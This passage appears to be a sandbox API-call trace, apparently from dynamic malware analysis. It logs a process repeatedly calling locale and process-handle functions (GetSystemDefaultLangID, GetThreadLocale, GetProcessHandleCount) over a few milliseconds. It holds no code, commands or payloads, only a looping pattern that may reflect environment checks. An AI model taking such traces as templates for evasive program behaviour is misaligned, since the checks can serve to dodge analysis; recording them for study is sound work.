returned 0x230409 [0064.342] GetThreadLocale () returned 0x409 [0064.342] GetCurrentProcess () returned 0xffffffff [0064.342] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.342] GetSystemDefaultLangID () returned 0x230409 [0064.342] GetThreadLocale () returned 0x409 [0064.342] GetCurrentProcess () returned 0xffffffff [0064.342] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.342] GetSystemDefaultLangID () returned 0x230409 [0064.342] GetThreadLocale () returned 0x409 [0064.342] GetCurrentProcess () returned 0xffffffff [0064.342] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.342] GetSystemDefaultLangID () returned 0x230409 [0064.342] GetThreadLocale () returned 0x409 [0064.342] GetCurrentProcess () returned 0xffffffff [0064.342] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.342] GetSystemDefaultLangID () returned 0x230409 [0064.342] GetThreadLocale () returned 0x409 [0064.342] GetCurrentProcess () returned 0xffffffff [0064.342] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.342] GetSystemDefaultLangID () returned 0x230409 [0064.342] GetThreadLocale () returned 0x409 [0064.342] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.343] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.343] GetSystemDefaultLangID () returned 0x230409 [0064.343] GetThreadLocale () returned 0x409 [0064.343] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.344] GetThreadLocale () returned 0x409 [0064.344] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.344] GetThreadLocale () returned 0x409 [0064.344] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.344] GetThreadLocale () returned 0x409 [0064.344] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.344] GetThreadLocale () returned 0x409 [0064.344] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.344] GetThreadLocale () returned 0x409 [0064.344] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.344] GetThreadLocale () returned 0x409 [0064.344] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.344] GetThreadLocale () returned 0x409 [0064.344] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.344] GetThreadLocale () returned 0x409 [0064.344] GetCurrentProcess () returned 0xffffffff [0064.344] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.344] GetSystemDefaultLangID () returned 0x230409 [0064.345] GetThreadLocale () returned 0x409 [0064.345] GetCurrentProcess () returned 0xffffffff [0064.345] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.345] GetSystemDefaultLangID () returned 0x230409 [0064.345] GetThreadLocale () returned 0x409 [0064.345] GetCurrentProcess () returned 0xffffffff [0064.345] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.345] GetSystemDefaultLangID () returned 0x230409 [0064.345] GetThreadLocale () returned 0x409 [0064.345] GetCurrentProcess () returned 0xffffffff [0064.345] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.345] GetSystemDefaultLangID () returned 0x230409 [0064.345] GetThreadLocale () returned 0x409 [0064.345] GetCurrentProcess () returned 0xffffffff [0064.345] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.345] GetSystemDefaultLangID () returned 0x230409 [0064.345] GetThreadLocale () returned 0x409 [0064.345] GetCurrentProcess () returned 0xffffffff [0064.345] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.345] GetSystemDefaultLangID () returned 0x230409 [0064.345] GetThreadLocale () returned 0x409 [0064.345] GetCurrentProcess () returned 0xffffffff [0064.345] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.345] GetSystemDefaultLangID () returned 0x230409 [0064.345] GetThreadLocale () returned 0x409 [0064.345] GetCurrentProcess () returned 0xffffffff [0064.345] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.345] GetSystemDefaultLangID () returned 0x230409 [0064.345] GetThreadLocale () returned 0x409 [0064.345] GetCurrentProcess () returned 0xffffffff [0064.345] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.346] GetSystemDefaultLangID () returned 0x230409 [0064.346] GetThreadLocale () returned 0x409 [0064.346] GetCurrentProcess () returned 0xffffffff [0064.346] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.346] GetSystemDefaultLangID () returned 0x230409 [0064.346] GetThreadLocale () returned 0x409 [0064.346] GetCurrentProcess () returned 0xffffffff [0064.346] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.346] GetSystemDefaultLangID () returned 0x230409 [0064.346] GetThreadLocale () returned 0x409 [0064.346] GetCurrentProcess () returned 0xffffffff [0064.346] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.346] GetSystemDefaultLangID () returned 0x230409 [0064.346] GetThreadLocale () returned 0x409 [0064.346] GetCurrentProcess () returned 0xffffffff [0064.346] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.346] GetSystemDefaultLangID () returned 0x230409 [0064.346] GetThreadLocale () returned 0x409 [0064.346] GetCurrentProcess () returned 0xffffffff [0064.346] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.346] GetSystemDefaultLangID () returned 0x230409 [0064.346] GetThreadLocale () returned 0x409 [0064.346] GetCurrentProcess () returned 0xffffffff [0064.346] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.346] GetSystemDefaultLangID () returned 0x230409 [0064.346] GetThreadLocale () returned 0x409 [0064.346] GetCurrentProcess () returned 0xffffffff [0064.347] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.347] GetSystemDefaultLangID () returned 0x230409 [0064.347] GetThreadLocale () returned 0x409 [0064.347] GetCurrentProcess () returned 0xffffffff [0064.347] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.347] GetSystemDefaultLangID () returned 0x230409 [0064.347] GetThreadLocale () returned 0x409 [0064.347] GetCurrentProcess () returned 0xffffffff [0064.347] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.347] GetSystemDefaultLangID () returned 0x230409 [0064.347] GetThreadLocale () returned 0x409 [0064.347] GetCurrentProcess () returned 0xffffffff [0064.347] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.347] GetSystemDefaultLangID () returned 0x230409 [0064.347] GetThreadLocale () returned 0x409 [0064.347] GetCurrentProcess () returned 0xffffffff [0064.347] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.347] GetSystemDefaultLangID () returned 0x230409 [0064.347] GetThreadLocale () returned 0x409 [0064.347] GetCurrentProcess () returned 0xffffffff [0064.347] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.347] GetSystemDefaultLangID () returned 0x230409 [0064.347] GetThreadLocale () returned 0x409 [0064.347] GetCurrentProcess () returned 0xffffffff [0064.347] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.348] GetSystemDefaultLangID () returned 0x230409 [0064.348] GetThreadLocale () returned 0x409 [0064.348] GetCurrentProcess () returned 0xffffffff [0064.348] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.348] GetSystemDefaultLangID () returned 0x230409 [0064.348] GetThreadLocale () returned 0x409 [0064.348] GetCurrentProcess () returned 0xffffffff [0064.348] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.348] GetSystemDefaultLangID () returned 0x230409 [0064.348] GetThreadLocale () returned 0x409 [0064.348] GetCurrentProcess () returned 0xffffffff [0064.348] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.348] GetSystemDefaultLangID () returned 0x230409 [0064.348] GetThreadLocale () returned 0x409 [0064.348] GetCurrentProcess () returned 0xffffffff [0064.348] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.348] GetSystemDefaultLangID () returned 0x230409 [0064.348] GetThreadLocale () returned 0x409 [0064.348] GetCurrentProcess () returned 0xffffffff [0064.348] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.348] GetSystemDefaultLangID () returned 0x230409 [0064.348] GetThreadLocale () returned 0x409 [0064.348] GetCurrentProcess () returned 0xffffffff [0064.348] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.348] GetSystemDefaultLangID () returned 0x230409 [0064.348] GetThreadLocale () returned 0x409 [0064.348] GetCurrentProcess () returned 0xffffffff [0064.348] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.348] GetSystemDefaultLangID () returned 0x230409 [0064.348] GetThreadLocale () returned 0x409 [0064.348] GetCurrentProcess () returned 0xffffffff [0064.348] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.349] GetCurrentProcess () returned 0xffffffff [0064.349] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.349] GetCurrentProcess () returned 0xffffffff [0064.349] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.349] GetCurrentProcess () returned 0xffffffff [0064.349] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.349] GetCurrentProcess () returned 0xffffffff [0064.349] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.349] GetCurrentProcess () returned 0xffffffff [0064.349] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.349] GetCurrentProcess () returned 0xffffffff [0064.349] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.349] GetCurrentProcess () returned 0xffffffff [0064.349] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.349] GetCurrentProcess () returned 0xffffffff [0064.349] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.349] GetSystemDefaultLangID () returned 0x230409 [0064.349] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.350] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.350] GetSystemDefaultLangID () returned 0x230409 [0064.350] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.350] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.350] GetSystemDefaultLangID () returned 0x230409 [0064.350] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.350] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.350] GetSystemDefaultLangID () returned 0x230409 [0064.350] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.350] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.350] GetSystemDefaultLangID () returned 0x230409 [0064.350] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.350] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.350] GetSystemDefaultLangID () returned 0x230409 [0064.350] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.350] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.350] GetSystemDefaultLangID () returned 0x230409 [0064.350] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.350] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.350] GetSystemDefaultLangID () returned 0x230409 [0064.350] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.350] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.350] GetSystemDefaultLangID () returned 0x230409 [0064.350] GetThreadLocale () returned 0x409 [0064.350] GetCurrentProcess () returned 0xffffffff [0064.351] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.351] GetSystemDefaultLangID () returned 0x230409 [0064.351] GetThreadLocale () returned 0x409 [0064.351] GetCurrentProcess () returned 0xffffffff [0064.351] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.351] GetSystemDefaultLangID () returned 0x230409 [0064.351] GetThreadLocale () returned 0x409 [0064.351] GetCurrentProcess () returned 0xffffffff [0064.351] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.351] GetSystemDefaultLangID () returned 0x230409 [0064.351] GetThreadLocale () returned 0x409 [0064.351] GetCurrentProcess () returned 0xffffffff [0064.351] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.351] GetSystemDefaultLangID () returned 0x230409 [0064.351] GetThreadLocale () returned 0x409 [0064.351] GetCurrentProcess () returned 0xffffffff [0064.351] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.351] GetSystemDefaultLangID () returned 0x230409 [0064.351] GetThreadLocale () returned 0x409 [0064.351] GetCurrentProcess () returned 0xffffffff [0064.351] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.351] GetSystemDefaultLangID () returned 0x230409 [0064.351] GetThreadLocale () returned 0x409 [0064.351] GetCurrentProcess () returned 0xffffffff [0064.351] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.351] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.353] GetCurrentProcess () returned 0xffffffff [0064.353] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.353] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.353] GetCurrentProcess () returned 0xffffffff [0064.353] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.353] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.353] GetCurrentProcess () returned 0xffffffff [0064.353] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.353] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.353] GetCurrentProcess () returned 0xffffffff [0064.353] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.353] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.353] GetCurrentProcess () returned 0xffffffff [0064.353] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.353] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.353] GetCurrentProcess () returned 0xffffffff [0064.353] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.353] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.353] GetCurrentProcess () returned 0xffffffff [0064.353] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.353] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.353] GetCurrentProcess () returned 0xffffffff [0064.353] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.353] GetSystemDefaultLangID () returned 0x230409 [0064.353] GetThreadLocale () returned 0x409 [0064.354] GetCurrentProcess () returned 0xffffffff [0064.354] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.354] GetSystemDefaultLangID () returned 0x230409 [0064.354] GetThreadLocale () returned 0x409 [0064.354] GetCurrentProcess () returned 0xffffffff [0064.354] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.354] GetSystemDefaultLangID () returned 0x230409 [0064.354] GetThreadLocale () returned 0x409 [0064.354] GetCurrentProcess () returned 0xffffffff [0064.354] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.354] GetSystemDefaultLangID () returned 0x230409 [0064.354] GetThreadLocale () returned 0x409 [0064.354] GetCurrentProcess () returned 0xffffffff [0064.354] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.354] GetSystemDefaultLangID () returned 0x230409 [0064.354] GetThreadLocale () returned 0x409 [0064.354] GetCurrentProcess () returned 0xffffffff [0064.354] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.354] GetSystemDefaultLangID () returned 0x230409 [0064.354] GetThreadLocale () returned 0x409 [0064.354] GetCurrentProcess () returned 0xffffffff [0064.354] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.354] GetSystemDefaultLangID () returned 0x230409 [0064.354] GetThreadLocale () returned 0x409 [0064.354] GetCurrentProcess () returned 0xffffffff [0064.354] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.354] GetSystemDefaultLangID () returned 0x230409 [0064.354] GetThreadLocale () returned 0x409 [0064.354] GetCurrentProcess () returned 0xffffffff [0064.354] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.355] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.355] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.355] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.355] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.355] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.355] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.355] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.355] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.355] GetSystemDefaultLangID () returned 0x230409 [0064.355] GetThreadLocale () returned 0x409 [0064.355] GetCurrentProcess () returned 0xffffffff [0064.356] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.356] GetSystemDefaultLangID () returned 0x230409 [0064.356] GetThreadLocale () returned 0x409 [0064.356] GetCurrentProcess () returned 0xffffffff [0064.356] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.356] GetSystemDefaultLangID () returned 0x230409 [0064.356] GetThreadLocale () returned 0x409 [0064.356] GetCurrentProcess () returned 0xffffffff [0064.356] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.356] GetSystemDefaultLangID () returned 0x230409 [0064.356] GetThreadLocale () returned 0x409 [0064.356] GetCurrentProcess () returned 0xffffffff [0064.356] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.356] GetSystemDefaultLangID () returned 0x230409 [0064.356] GetThreadLocale () returned 0x409 [0064.356] GetCurrentProcess () returned 0xffffffff [0064.356] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.356] GetSystemDefaultLangID () returned 0x230409 [0064.356] GetThreadLocale () returned 0x409 [0064.356] GetCurrentProcess () returned 0xffffffff [0064.356] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.356] GetSystemDefaultLangID () returned 0x230409 [0064.356] GetThreadLocale () returned 0x409 [0064.356] GetCurrentProcess () returned 0xffffffff [0064.356] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.356] GetSystemDefaultLangID () returned 0x230409 [0064.356] GetThreadLocale () returned 0x409 [0064.356] GetCurrentProcess () returned 0xffffffff [0064.356] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.357] GetSystemDefaultLangID () returned 0x230409 [0064.357] GetThreadLocale () returned 0x409 [0064.357] GetCurrentProcess () returned 0xffffffff [0064.357] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.357] GetSystemDefaultLangID () returned 0x230409 [0064.357] GetThreadLocale () returned 0x409 [0064.357] GetCurrentProcess () returned 0xffffffff [0064.357] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.357] GetSystemDefaultLangID () returned 0x230409 [0064.357] GetThreadLocale () returned 0x409 [0064.357] GetCurrentProcess () returned 0xffffffff [0064.357] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.357] GetSystemDefaultLangID () returned 0x230409 [0064.357] GetThreadLocale () returned 0x409 [0064.357] 